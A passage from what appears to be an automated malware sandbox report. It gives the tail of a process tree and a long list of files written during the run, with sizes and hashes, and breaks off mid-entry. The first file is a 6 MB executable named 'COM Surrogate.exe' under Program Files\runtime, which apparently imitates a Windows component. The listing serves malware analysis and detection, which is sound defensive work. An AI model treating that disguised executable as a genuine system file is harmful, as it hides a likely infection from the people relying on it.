                                                                                          • C:\Windows\System32\spoolsv.exe
                                                                                            C:\Windows\System32\spoolsv.exe
                                                                                            1⤵
                                                                                              PID:3700
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6936 -ip 6936
                                                                                              1⤵
                                                                                                PID:3948

                                                                                              Network

                                                                                              MITRE ATT&CK Enterprise v15

                                                                                              Replay Monitor

                                                                                              Loading Replay Monitor...

                                                                                              Downloads

                                                                                              • C:\Program Files\runtime\COM Surrogate.exe

                                                                                                Filesize

                                                                                                6.0MB

                                                                                                MD5

                                                                                                cb545a86d5c42c0c903ee065462bb9c9

                                                                                                SHA1

                                                                                                6b6cf8156f38ce4884f29f6cb9029e546db183b8

                                                                                                SHA256

                                                                                                43022961cb401814a9899e46269705b3b55c1b364cccfd291445b809304e872a

                                                                                                SHA512

                                                                                                a1f2e14480e11ad3555a0604ac492b5b1829955399de87883b3aaea8bb99bf7a4c1a4e7ddab0a344310dcfc05b93fcc074f6f231e046a79372ee4dda17cb8dd4

                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

                                                                                                Filesize

                                                                                                734B

                                                                                                MD5

                                                                                                e192462f281446b5d1500d474fbacc4b

                                                                                                SHA1

                                                                                                5ed0044ac937193b78f9878ad7bac5c9ff7534ff

                                                                                                SHA256

                                                                                                f1ba9f1b63c447682ebf9de956d0da2a027b1b779abef9522d347d3479139a60

                                                                                                SHA512

                                                                                                cc69a761a4e8e1d4bf6585aa8e3e5a7dfed610f540a6d43a288ebb35b16e669874ed5d2b06756ee4f30854f6465c84ee423502fc5b67ee9e7758a2dab41b31d3

                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

                                                                                                Filesize

                                                                                                192B

                                                                                                MD5

                                                                                                553f4769ccf9c78f3f95e06127d96158

                                                                                                SHA1

                                                                                                a8e9afdddac655df6971d864ef0921aeb25219e3

                                                                                                SHA256

                                                                                                628f56f2c2daf9a177b27ae08db3b2df03e5d93e74504d06520ae1339af1fcdc

                                                                                                SHA512

                                                                                                81890dded2643a5371a36bcb68c44124d94ac93a3f34c240d5c9f0eb4ba2ec4b26c4fa1baa90c8d25fe8670c542ff0e72c67d317f034304d8bd6bc4389a23b3d

                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\_locales\en_CA\messages.json

                                                                                                Filesize

                                                                                                851B

                                                                                                MD5

                                                                                                07ffbe5f24ca348723ff8c6c488abfb8

                                                                                                SHA1

                                                                                                6dc2851e39b2ee38f88cf5c35a90171dbea5b690

                                                                                                SHA256

                                                                                                6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

                                                                                                SHA512

                                                                                                7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.89.1_0\dasherSettingSchema.json

                                                                                                Filesize

                                                                                                854B

                                                                                                MD5

                                                                                                4ec1df2da46182103d2ffc3b92d20ca5

                                                                                                SHA1

                                                                                                fb9d1ba3710cf31a87165317c6edc110e98994ce

                                                                                                SHA256

                                                                                                6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

                                                                                                SHA512

                                                                                                939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

                                                                                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                Filesize

                                                                                                2B

                                                                                                MD5

                                                                                                d751713988987e9331980363e24189ce

                                                                                                SHA1

                                                                                                97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                SHA256

                                                                                                4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                SHA512

                                                                                                b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                Filesize

                                                                                                2KB

                                                                                                MD5

                                                                                                d85ba6ff808d9e5444a4b369f5bc2730

                                                                                                SHA1

                                                                                                31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                                SHA256

                                                                                                84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                                SHA512

                                                                                                8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                Filesize

                                                                                                1KB

                                                                                                MD5

                                                                                                def65711d78669d7f8e69313be4acf2e

                                                                                                SHA1

                                                                                                6522ebf1de09eeb981e270bd95114bc69a49cda6

                                                                                                SHA256

                                                                                                aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c

                                                                                                SHA512

                                                                                                05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

                                                                                                Filesize

                                                                                                150B

                                                                                                MD5

                                                                                                d7be88202a2ca16fcfa10e6b3ac7a0ad

                                                                                                SHA1

                                                                                                82feeab672f6a9c3b35a619cdca3b0410c566c4d

                                                                                                SHA256

                                                                                                084ee4ec2c3c4d47d4ad24e60e26082b5b62e2fca6d82ea59f7f0a2853926c3c

                                                                                                SHA512

                                                                                                970db9209502d4bc8f8f375c5138ce67b13a1e91ddf821ff4870909b37d1381fff7f0ec1136193efb082c327fe440cd83ff1a7dd15b2a469a9dfadfdf9931916

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

                                                                                                Filesize

                                                                                                284B

                                                                                                MD5

                                                                                                48ff1d23e580149d5dbee22126e1ec99

                                                                                                SHA1

                                                                                                77f23c4eefd32c815c7a776490a68346a0b694f5

                                                                                                SHA256

                                                                                                090ae6cbb1835287a5f7694aaab48ebbae730daf473d11683d618fefb45184c6

                                                                                                SHA512

                                                                                                39cfe743b8d0b9cadbc3337b70a6f5fab259db596276f8c981e01a450e4ecde75c4598aebb162277b2536c2d3c6111ec3424f886bc3842f4a9df0c24b82048da

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

                                                                                                Filesize

                                                                                                418B

                                                                                                MD5

                                                                                                605a41b57c21ed407ee11ef0abbdf476

                                                                                                SHA1

                                                                                                d97cce1d048fe967c9c79dad145d78767ccf9b40

                                                                                                SHA256

                                                                                                2f62838b78abcc290cc026e060891febe3fbfc4517ab5fdc51cc88389460e368

                                                                                                SHA512

                                                                                                e0efa26f662ca6f50d2eb77c4ca6c11afc4b571c56653da6e37e577f1dc55b92db1b65396b731c2efb204596def065f621c5073e34a78311b0685156793da4ab

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

                                                                                                Filesize

                                                                                                686B

                                                                                                MD5

                                                                                                0de793f66e1f57e25c13cb29cb615670

                                                                                                SHA1

                                                                                                c8678b9f1970905b3356c109dae691a123ecb016

                                                                                                SHA256

                                                                                                2b4c3f9b0ef25bd2a428a3027718294fc6e5a15c47702ed245299cbdbff3f219

                                                                                                SHA512

                                                                                                45c4d8ccc192b5069564b76bb7feb822354148528bb3f7f8000026edd004ac406ab801bfdb7bf45f80dfb1df2fa960304fbf7a1c2f8a446a07ab38b7b1219351

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

                                                                                                Filesize

                                                                                                1KB

                                                                                                MD5

                                                                                                3e0baf57a2878cd1e408ca95c5d12f90

                                                                                                SHA1

                                                                                                d7d92a99d89b4e941cb3239b9b6e9be625cab76c

                                                                                                SHA256

                                                                                                71264b1594ed8f26a40c1b55a6f76082b43b18f432f44d9c8b36bb168ca93850

                                                                                                SHA512

                                                                                                b70a77f813c0aa03cc1b28ddaaa6579c1982399b826332bb9a270ac7bf476be7cb0c33f80f1e9094131016da464316ef0bfed6470d13d306c8eb9a5dcbf836ad

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

                                                                                                Filesize

                                                                                                1KB

                                                                                                MD5

                                                                                                5453ef6920a4eca0b4c5765f0abec6fc

                                                                                                SHA1

                                                                                                74a902f62e83d177b99b836b73699448846a8282

                                                                                                SHA256

                                                                                                e1d31f71f9d16c2a3475fc60bd846129a57e9ec4751d4649de8f7035e04ca4c7

                                                                                                SHA512

                                                                                                bfffa8d7751fa132c6247ab589fdd1762811de8f07ab2e7be3184ca21c90578b5e69182994c3554641650e2e88a627624fc5aa620d09ccdc432a5bc62e82ced5

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

                                                                                                Filesize

                                                                                                1KB

                                                                                                MD5

                                                                                                c2f30d8447c4e73ba11ea9310534fdbe

                                                                                                SHA1

                                                                                                89f4e83d440120a9d0b573091a14d20a7a4533dd

                                                                                                SHA256

                                                                                                e5fc07b0c6b5e45ef435c471a683c24b07de9e511110692769784dc921c2fbc9

                                                                                                SHA512

                                                                                                4ed7007787c237416a8fcfbbc5c4b302a925da9b9f3366e7156d3e744aa21f2ad0fab11623ba6025221466f788bb4632c569152d92963a63ad1ebc678dcbef36

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\09b60ff3-2aeb-4732-99fc-f632d40be4b1.dmp

                                                                                                Filesize

                                                                                                825KB

                                                                                                MD5

                                                                                                5967b2ecc8d6eb0296f84245349ca2ed

                                                                                                SHA1

                                                                                                5fcf26367d56fc3220a535495d767be2978e82dc

                                                                                                SHA256

                                                                                                33cd85f19d60b47ff4927cd6b22513830cba089527d60bafa8a8b559921561e6

                                                                                                SHA512

                                                                                                2c94ca42fc3f09b75318369b49484e89da2fff7daee931b7d170e8837e5c405b942787cc92c9bb7a0ff3e0f3e21db069aff3a60f0c944f89300493e154e4a87a

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\15ac4442-2a9d-4e3f-be17-c2695a63d3f6.dmp

                                                                                                Filesize

                                                                                                835KB

                                                                                                MD5

                                                                                                41646da47152fb8f5b4a9f775b5b72be

                                                                                                SHA1

                                                                                                cc74041cc996192359fb4bfcbb281993c1fa170f

                                                                                                SHA256

                                                                                                969f5f189157d999f867b549311310d3b8648687d54fc21110c2dae5646768d1

                                                                                                SHA512

                                                                                                36600d51dd8e330b2ba162f459394d36cd9bd514e6c6363157f2511999820a9a01082d22e096e508cd8c1645ccb364630d154a0fa08969c091b0c4952c0dc2d3

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\1c43ba70-1f21-4bea-8897-a8a25985671d.dmp

                                                                                                Filesize

                                                                                                825KB

                                                                                                MD5

                                                                                                63a1b01eadc72ee84f3402f11a36ad0b

                                                                                                SHA1

                                                                                                cccaa9ae02f7df24c694c310d97cd84e5b08d325

                                                                                                SHA256

                                                                                                aae1c51c91b978100d2a0c1a31131095e23435286940726876206087c72a7f81

                                                                                                SHA512

                                                                                                9ed2c1f866cec2daf4a5c6604bf03116a8ea7099bc02e66f5b7ce90d8f3056e1417a04b6bca624ae568c67753a4175f76a025970163705d1d1522b06af267881

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\34f3a865-b9fd-431e-86f1-2d41f61fd0b1.dmp

                                                                                                Filesize

                                                                                                823KB

                                                                                                MD5

                                                                                                84341c35003a16ed3ed4a619fd5cc942

                                                                                                SHA1

                                                                                                99e6247e447b8928cdf9af92bd0a3edc6794173f

                                                                                                SHA256

                                                                                                4be7b6da70e2f5d0ee426446aa6373632f84a3fe4c8e716f11c585eaa6cf4dd0

                                                                                                SHA512

                                                                                                5394a1338a8cb0f3a21799195f1bf8311febcf8cf922d7ff204ae5f1589165f021d74238ae0450483ad3aa27e579122a650f9f0ed7227391767b16ef552a3171

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\3771e26f-796e-45f8-a81d-e7fb76dc9d07.dmp

                                                                                                Filesize

                                                                                                825KB

                                                                                                MD5

                                                                                                d22ac8e9ca176e37d49f4b7f1e7b7438

                                                                                                SHA1

                                                                                                3fbcc686151f677cfcf8939988c040a0ceff05c3

                                                                                                SHA256

                                                                                                43b5e865ba3702f102b98ea211a3601c03ad316df92e894046a97f6212e24dd9

                                                                                                SHA512

                                                                                                a97311c4265ba14cc7a8e5f7b94ddf3d259cd8135eac436423781e137e7485c76076bc6c80da788c5f451c9864aaaf35e064bade300fd6d89d1a9cd0774b0cfd

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\493a7598-d0ae-4833-abc8-c684f84f44f0.dmp

                                                                                                Filesize

                                                                                                829KB

                                                                                                MD5

                                                                                                ce7e7c969c99547fdd8ee9aad54496f4

                                                                                                SHA1

                                                                                                bb38a1ed4da36cc138cac479d389be7f6f7ccb18

                                                                                                SHA256

                                                                                                b6a0750823de8ce2b2c9dae130d6304ef7d1d66adef2cc6356e55ce741066fbd

                                                                                                SHA512

                                                                                                6d94839cfdf03185ceaaa124b2d61b2dc877ae32986b210db18c23a591971a6c32c720b25f716c370cee3d9d03aa90a24d1704af84902043094065a322a98252

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\5a3ffd8b-18b2-4bba-b351-8175a3c8cd17.dmp

                                                                                                Filesize

                                                                                                838KB

                                                                                                MD5

                                                                                                cc11a3e21ac176e792cb5e86d815ae8f

                                                                                                SHA1

                                                                                                1b307abf52472eb1936adf1dca460f806bffbaeb

                                                                                                SHA256

                                                                                                3043c474944f61f4344a818bad74c08dc9ce56e7a538fc3d418776bb8c3e37f0

                                                                                                SHA512

                                                                                                57a40fc0b77de890f2ae1837af0b8018ec11370bfbb6a4640c1097770280e959069102534179714ab9cfd85cb38e04fd047576038551f3286e43fbfc05c0a647

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\63a48469-67e0-409d-ab4d-255810b41bde.dmp

                                                                                                Filesize

                                                                                                838KB

                                                                                                MD5

                                                                                                4a422a1d3a719fca9b17e0e7ac88ccc6

                                                                                                SHA1

                                                                                                f8567b53dce73299e8e7af94e18c08dababcda8d

                                                                                                SHA256

                                                                                                a5b2879791eb3a97bc2aa34ef07857e9b38e52e8cf6b5e80fe5bde876b277ee5

                                                                                                SHA512

                                                                                                05b0e58e48774bb7df334b35c20dbe5846dfa138768fe7f04a50c652e06e3b3578b298c6610c273008db7c7cde842f1afc0ead2729422df9e39f3d0c506d27dc

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\6725f684-51ff-46db-97e4-d346123411e8.dmp

                                                                                                Filesize

                                                                                                827KB

                                                                                                MD5

                                                                                                8e16efa3cb572fff4a2ad7f441a237f7

                                                                                                SHA1

                                                                                                b7a1d77062951e6e376ab3bcc9b6ad81bee0cb61

                                                                                                SHA256

                                                                                                b652d30b3e0ccafc615d24938b238cde350bf913a831a110d35214b8c57634fb

                                                                                                SHA512

                                                                                                1ce5c58f481239aff95e59eb80aee0293867d45b1b4c72efb20dda2ebe96d6a51cd96fe2027114871882c564a9a016aa7f83c945c6a2862f964e319e4643961b

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\9d74013d-689c-4bd5-8207-99a8986f46ff.dmp

                                                                                                Filesize

                                                                                                823KB

                                                                                                MD5

                                                                                                5eb6e62430933e4f3f0d88aca2e90119

                                                                                                SHA1

                                                                                                686c59b233ae0c7e128eba7ca7ef561e5c485bb1

                                                                                                SHA256

                                                                                                399dd12b9eb292839fb13f18f96de1e5d79505bf886bdec92e907f2160835a6a

                                                                                                SHA512

                                                                                                6939c360654a1d9c94db1664f4b0d5fcfe4b68bf6c03d17241bfa4c076a0a80216d639a38b840902005786168f30c9e8397a73d1f9df6e3abcb8fc171a6a1379

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\b561fc57-5b94-4a2d-ba70-72d0e768b0a9.dmp

                                                                                                Filesize

                                                                                                835KB

                                                                                                MD5

                                                                                                77302f9794e7a7713e9451d218092e2c

                                                                                                SHA1

                                                                                                7dd546e52dcbe244b7bea914f7e133266ff59ac6

                                                                                                SHA256

                                                                                                ecdc4b2a15b10c9f88b3464f9e676e52bb11e7836d0169dcd6b9f656fe84112f

                                                                                                SHA512

                                                                                                d285d3a3fa15cb679720fce90381ae00d96667ecc2932584d5c5472912adbb7fba6bc85bc0828a3cf405171e9e421ce7fe511bf6246811faf91dc3eebbf04e76

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\c843381f-90d6-4cae-8ecb-a7c80c567a89.dmp

                                                                                                Filesize

                                                                                                838KB

                                                                                                MD5

                                                                                                6aed41865788315c61fb55e176d82193

                                                                                                SHA1

                                                                                                61e6db86bd6144803e487f7f5847ecd123eae911

                                                                                                SHA256

                                                                                                6d8f398f33366fb07e786f7cbb90108338c1ae61ba52f4e2291d4d3a10b0f5cc

                                                                                                SHA512

                                                                                                4622663dea554321adf3c58b8dbfeca1b7ce91cacb3bf614ab367994514e10dcf1179aaaad89fb253667020a3503d3f4706943aca29ea33b502fdc45620becc7

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\e8db939b-767e-4eac-944e-7a1b7c395b67.dmp

                                                                                                Filesize

                                                                                                823KB

                                                                                                MD5

                                                                                                f75870bbfa0208af3b1d6a4ce703ca60

                                                                                                SHA1

                                                                                                dd0c044f627f8ece6fce175273280a664c04ffa4

                                                                                                SHA256

                                                                                                509fe1828c2871b25008cc9a8cd5324015fc5ee8ca202dc21b7eb608cbfb07a1

                                                                                                SHA512

                                                                                                b1483cda0608997ddf3087423d0bfbc00b9660fc901e9b9cac1750b8bf17032e2ec4eab8cff65c776cfc39d9daa2a09a66f3a931a31bcaff15b00c542ed75dec

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\ecc5facf-2a87-4953-9789-24be6c40985c.dmp

                                                                                                Filesize

                                                                                                829KB

                                                                                                MD5

                                                                                                d72d58257dd9e28b5b14c3b3e74940d3

                                                                                                SHA1

                                                                                                e64553020a2317c0347689f8bdf69473e4c4ee41

                                                                                                SHA256

                                                                                                34b51f97166a32cc2cb2bc8dbfb62cdaec7e94078c290d21723ba02e2eaec47c

                                                                                                SHA512

                                                                                                0e7670ee6664c9f6cf55b19afc903b9893afd703fda3da2a00ffdc7939d33e2d4374693592d0b6bfefc07c5e5b3c80a400ffb67e387309ae71abea942ad33a51

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\f248c1a4-3f7e-4e8f-b3ce-9064762b9b87.dmp

                                                                                                Filesize

                                                                                                835KB

                                                                                                MD5

                                                                                                45c69b3ecd41c06d7840ca3acce7e240

                                                                                                SHA1

                                                                                                fe42e46788cbabb59c89ed8215867d9395f02ba1

                                                                                                SHA256

                                                                                                59650e80df41fbf77c7c0596cdd6a0fef50195808a485a7e601c503e390080db

                                                                                                SHA512

                                                                                                e5ce2deb63aadab5399cdb0e4228bcf71e87f399fb36af9a9207589f18156d90182c32fe31b3f61c0e56d89f578c727df47477aa699c61193e2eeb6dbbee368b

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                Filesize

                                                                                                152B

                                                                                                MD5

                                                                                                9f4a0b24e1ad3a25fc9435eb63195e60

                                                                                                SHA1

                                                                                                052b5a37605d7e0e27d8b47bf162a000850196cd

                                                                                                SHA256

                                                                                                7d70a8fc286520712421636b563e9ee32335bca9a5be764544a084c77ddd5feb

                                                                                                SHA512

                                                                                                70897560b30f7885745fede85def923fb9a4f63820e351247d5dcbe81daab9dab49c1db03b29c390f58b3907d5025737a84fff026af2372c3233bc585dcfd284

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                Filesize

                                                                                                152B

                                                                                                MD5

                                                                                                4c9b7e612ef21ee665c70534d72524b0

                                                                                                SHA1

                                                                                                e76e22880ffa7d643933bf09544ceb23573d5add

                                                                                                SHA256

                                                                                                a64366387921aba157bba7472244791d5368aef8ecaf6472b616e1e130d7d05e

                                                                                                SHA512

                                                                                                e195e1ce5e7c06d193aa1f924d0079ea72b66eb22c3aea5b6811172251768f649368734e817996d9f0f72ddfd0e2bf2454aaee0bc650eaffd56fa125a334ae88

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                Filesize

                                                                                                152B

                                                                                                MD5

                                                                                                58bcfd2b6fa28dbf99eb6a7ed9394231

                                                                                                SHA1

                                                                                                f82842104338dfe7b6847632aae732caee720660

                                                                                                SHA256

                                                                                                f4209283c823bb2386be7ab7dcc4570f756cc1fc9220b9366834e60ea9d8d40e

                                                                                                SHA512

                                                                                                a6969993d0dcb9d8377ce849836289675d14dc539895034756bf10dc4f49ee2ea05f001a1800e2a1d6e7545c973aa09bf74ec42b333c7a46cde631efc6b41eb1

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                Filesize

                                                                                                152B

                                                                                                MD5

                                                                                                e2fa521cb806a5d289081405c95cbb70

                                                                                                SHA1

                                                                                                ce7461cba7714959b0f852e316bd5975d295308c

                                                                                                SHA256

                                                                                                5f23affe8c6a577ba84c5c4746278118e44b98a64f3ecf7c8afdf88d224791f5

                                                                                                SHA512

                                                                                                cf4dd8c374717158e0b3499aea9532ecbef30e7e25b443eb4456c1376b951998736c5f035dd9e5f49ecafb6e18de165a97dfca98098774aa7a3f3858e117dccf

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                Filesize

                                                                                                152B

                                                                                                MD5

                                                                                                6123ac7d3977e3203608acbdf6840773

                                                                                                SHA1

                                                                                                b714e1b7b619a8c55833a337cd339d3089790658

                                                                                                SHA256

                                                                                                c5ed2d22356a1e3c845a73e973a5e5c8c545759b08a6a2923ef43c0d43c54c0c

                                                                                                SHA512

                                                                                                f355af84e1d245e315bc7bfc03a31061d29da3a4a2935e8f7d7cd032d2e5abe1c79899194e041c3a5719f1a531fe0ecb640e4fa2a71ac3c31f3062ad703a3d28

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                Filesize

                                                                                                152B

                                                                                                MD5

                                                                                                73bf3e9af4732f17171970b73f70bf11

                                                                                                SHA1

                                                                                                0970534c3ceb003dc26015d81279dcededdf7693

                                                                                                SHA256

                                                                                                c82a4d8a38065f0d387e0d6cbd61901503dd23c77beb07f5f5b90f3c3e3cf0aa

                                                                                                SHA512

                                                                                                3b65e10fa3483488278b4ab970b871c3e65c926c4cfb8e6fd192ba05ef9873e894b8ff02c5c00663e11e6bbd5faf152ea2171db3c3be30667e242c4949088ba8

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                Filesize

                                                                                                152B

                                                                                                MD5

                                                                                                857912a65c634c076788cd7696478a55

                                                                                                SHA1

                                                                                                45dfd5e62e97c829b345736768f8d56463f73c78

                                                                                                SHA256

                                                                                                ee0d6ae3b6045b8497df880d026a52474d6a831970dfb0153e661ea8bd12da53

                                                                                                SHA512

                                                                                                aa08aeeddde4c76c61d1644ccca388614612a50579bcd41e0b574e9287d4dc8e16bea5216383ca532ac2260f878b59d70f18f8ab37ae5696fbcb82528bc29e79

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                Filesize

                                                                                                152B

                                                                                                MD5

                                                                                                498140b1bd8f900746d7f80d6691bcf9

                                                                                                SHA1

                                                                                                9d7670b13d5c44646ec5f269971036d770a780ae

                                                                                                SHA256

                                                                                                8e570e115188db95783f56d08191da660a8a6411c3ce7ae038237575d8c2c11b

                                                                                                SHA512

                                                                                                f4f24e3aaa701a981e15dd51b67e45f627741ed073f79582a3b5af03262f237a7f86fa78ea47182824017dc8c6f66998d6a5f2bb23dfa490ef8c19e124f1cfe1

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                Filesize

                                                                                                152B

                                                                                                MD5

                                                                                                71eca4bfbdce593310b447acdb70e9ad

                                                                                                SHA1

                                                                                                3408496201a48dc3f4a87beeeb9d7cc307440093

                                                                                                SHA256

                                                                                                1b20bc5a75452ac35753e8cc805843f82c46f10c0090c4d824c227131456638a

                                                                                                SHA512

                                                                                                ffa50d3d2b8f1cfb6f5935808f91352caa8b5ceb4d3a96aefd0ba0beca44d1cee5056caf16b65a5930c4b56d41dcf544953847de16ac664bb31b8182d8029f10

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                Filesize

                                                                                                152B

                                                                                                MD5

                                                                                                6beb07588ef3071ed1ccb267c0cbd355

                                                                                                SHA1

                                                                                                3810a3c5e5281eb62b039e8a3479a07612d9808c

                                                                                                SHA256

                                                                                                d2d1ba73d06750c755517dc8388ecea61f959b19eee9130681cff52342758501

                                                                                                SHA512

                                                                                                8a42ee2a033ae33f27222c03865fb871ff01897ff326f5ff860e60a111ed4ff07b2302c73aa078edecf0c11acf52fec7cc3281e390967dc0845c871b39560efc

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\551029cf-f236-4063-95bc-1f1c5731e23d.tmp

                                                                                                Filesize

                                                                                                1B

                                                                                                MD5

                                                                                                5058f1af8388633f609cadb75a75dc9d

                                                                                                SHA1

                                                                                                3a52ce780950d4d969792a2559cd519d7ee8c727

                                                                                                SHA256

                                                                                                cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

                                                                                                SHA512

                                                                                                0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                Filesize

                                                                                                5KB

                                                                                                MD5

                                                                                                54b3ff65a66b1818c50851e175eaa927

                                                                                                SHA1

                                                                                                76952fce6f5013048e20f6beea516703fac75897

                                                                                                SHA256

                                                                                                0a952f7850f6f4a1ea7064ca777ac4cee6707c0f8f0f57b1a2da162cc85117ae

                                                                                                SHA512

                                                                                                f05910a8d37bbc1f9c56abdfcda104b78793d909fb163b3bb0d3a6afa814c3251f0ac2911bff41c5dabd50a1fc6f903ab00bbf33090e4e3a57990633d0dd6c1e

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                Filesize

                                                                                                6KB

                                                                                                MD5

                                                                                                698b76e7722c3ca38abce7068d815597

                                                                                                SHA1

                                                                                                b5938e49f3950748c7dcbdbc9b919ba8e65b53fe

                                                                                                SHA256

                                                                                                6886f7b057ff116a07903d4a5ec0cf67c002b0b118ba457fb8b224131f339319

                                                                                                SHA512

                                                                                                7818ad691e658e00e0b02ce01e4fcc43d4a0cd244d0db4d99ac917fb3486c22701f1de090e9615c96059f0a6fe6f95ace4345c0fe4265fa0398f3e97047ca06f

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                Filesize

                                                                                                6KB

                                                                                                MD5

                                                                                                60193816fbb9d08193edb708bbddba20

                                                                                                SHA1

                                                                                                babcdd89cc99ae92ae4907c4aa91537a8a0811c7

                                                                                                SHA256

                                                                                                8bff6db79e99b5cb2b7081f2fae1b5807b7c540bdb598c8af8f952712b357f9e

                                                                                                SHA512

                                                                                                87318d591840e032a13ea02bd9935b30dff2a4b8c1565915ac8a054edb59ff8771134ce6c5f427461370f0adc7c61dece0d92c894491918a6b2ebc957b9c7974

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                Filesize

                                                                                                10KB

                                                                                                MD5

                                                                                                e80433af7c253d7cf6eb3c2847ed53a9

                                                                                                SHA1

                                                                                                d9cee0ef3ddab3f2572fa1784e060390969e1438

                                                                                                SHA256

                                                                                                2970887f386c4589554c7617fac0bc7c7fdca7dbaa4c20a785602fbddf5d4fdb

                                                                                                SHA512

                                                                                                8407b057a11d8133827cdc1619eb92b04fa479fe2889d220d03baeaf229ba49c7d20030f4b85f3f82190098252751f3157d23af733abd113a9612a7847c16d8f

                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

                                                                                                Filesize

                                                                                                264KB

                                                                                                MD5

